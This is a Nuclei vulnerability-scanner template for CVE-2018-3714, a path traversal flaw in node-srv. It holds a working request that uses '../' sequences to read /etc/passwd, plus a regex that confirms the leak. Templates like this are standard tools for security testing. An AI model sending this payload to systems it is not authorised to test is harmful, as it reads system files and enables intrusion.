nuclei-templates/cves/2018/CVE-2018-3714.yaml

22 lines
449 B
YAML

id: CVE-2018-3714
info:
name: node-srv Path Traversal
author: madrobot
severity: high
reference: https://hackerone.com/reports/309124
tags: cve,cve2018,nodejs,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body